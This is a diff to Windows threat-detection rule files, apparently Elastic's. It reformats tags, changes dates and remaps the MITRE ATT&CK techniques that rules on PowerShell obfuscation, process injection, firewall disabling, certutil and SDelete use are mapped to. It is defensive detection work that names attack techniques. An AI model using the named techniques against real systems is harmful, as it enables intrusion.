-[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml index 251ddd0e74c..c8686112bee 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -100,7 +100,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -146,39 +153,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml index 1886459dd34..ef57939e469 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -98,7 +98,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -145,39 +152,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml index 95a1b579929..c92ccaac12b 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/03" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -100,7 +100,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -167,39 +174,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml index 451282d8be6..eea41de377c 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -167,21 +167,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_process_injection.toml b/rules/windows/defense_evasion_posh_process_injection.toml index eb10b5a9081..26f4689951f 100644 --- a/rules/windows/defense_evasion_posh_process_injection.toml +++ b/rules/windows/defense_evasion_posh_process_injection.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -139,34 +139,49 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.001" +name = "Dynamic-link Library Injection" +reference = "https://attack.mitre.org/techniques/T1055/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.002" +name = "Portable Executable Injection" +reference = "https://attack.mitre.org/techniques/T1055/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml index e8dd124e358..772ec9c6030 100644 --- a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml +++ b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Austin Songer"] @@ -74,7 +74,21 @@ references = [ risk_score = 47 rule_id = "f63c8e3c-d396-404f-b2ea-0379d3942d73" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -92,18 +106,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.004" name = "Disable or Modify System Firewall" reference = "https://attack.mitre.org/techniques/T1562/004/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml index 3601255196c..d3516cd5119 100644 --- a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml +++ b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/07" [rule] author = ["Elastic"] @@ -94,23 +94,31 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/defense_evasion_regmod_remotemonologue.toml b/rules/windows/defense_evasion_regmod_remotemonologue.toml index 38470bfed72..7aba4b1f611 100644 --- a/rules/windows/defense_evasion_regmod_remotemonologue.toml +++ b/rules/windows/defense_evasion_regmod_remotemonologue.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/18" [rule] author = ["Elastic"] @@ -54,7 +54,18 @@ references = [ risk_score = 47 rule_id = "c18975f5-676c-4091-b626-81e8938aa2ee" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -107,36 +118,19 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.015" -name = "Component Object Model Hijacking" -reference = "https://attack.mitre.org/techniques/T1546/015/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1546.015" -name = "Component Object Model Hijacking" -reference = "https://attack.mitre.org/techniques/T1546/015/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_right_to_left_override.toml b/rules/windows/defense_evasion_right_to_left_override.toml index b51b6537de2..2b351c4f41b 100644 --- a/rules/windows/defense_evasion_right_to_left_override.toml +++ b/rules/windows/defense_evasion_right_to_left_override.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -87,18 +87,36 @@ any where host.os.type == "windows" and event.category in ("file", "process") an [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.002" name = "Right-to-Left Override" reference = "https://attack.mitre.org/techniques/T1036/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_sc_sdset.toml b/rules/windows/defense_evasion_sc_sdset.toml index 1bd4d0e93cb..e543bd70b60 100644 --- a/rules/windows/defense_evasion_sc_sdset.toml +++ b/rules/windows/defense_evasion_sc_sdset.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/16" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -65,7 +65,19 @@ references = [ risk_score = 47 rule_id = "5188c68e-d3de-4e96-994d-9e242269446f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -79,31 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml index e89f301a889..baa9ab7adee 100644 --- a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml +++ b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32 risk_score = 47 rule_id = "9aa0e1f6-52ce-42e1-abb3-09657cee2698" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -75,23 +88,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.002" name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml index fdb46fca621..4436cce7568 100644 --- a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml +++ b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -58,7 +58,20 @@ This rule identifies file name patterns generated by the use of SDelete utility risk_score = 21 rule_id = "5aee924b-6ceb-4633-980e-1bde8cdb40c5" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -69,18 +82,31 @@ file where host.os.type == "windows" and event.type == "change" and file.name : [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml index 007beca6c09..18215c26fe3 100644 --- a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -64,7 +64,20 @@ references = [ risk_score = 47 rule_id = "b9960fef-82c6-4816-befa-44745030e917" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,7 +99,6 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -96,13 +108,32 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml index fb5d81c08d8..d31877d1658 100644 --- a/rules/windows/defense_evasion_suspicious_certutil_commands.toml +++ b/rules/windows/defense_evasion_suspicious_certutil_commands.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -112,7 +112,20 @@ references = [ risk_score = 47 rule_id = "fd70c98a-c410-42dc-a2e3-761c71848acf" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -127,39 +140,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1649" -name = "Steal or Forge Authentication Certificates" -reference = "https://attack.mitre.org/techniques/T1649/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = 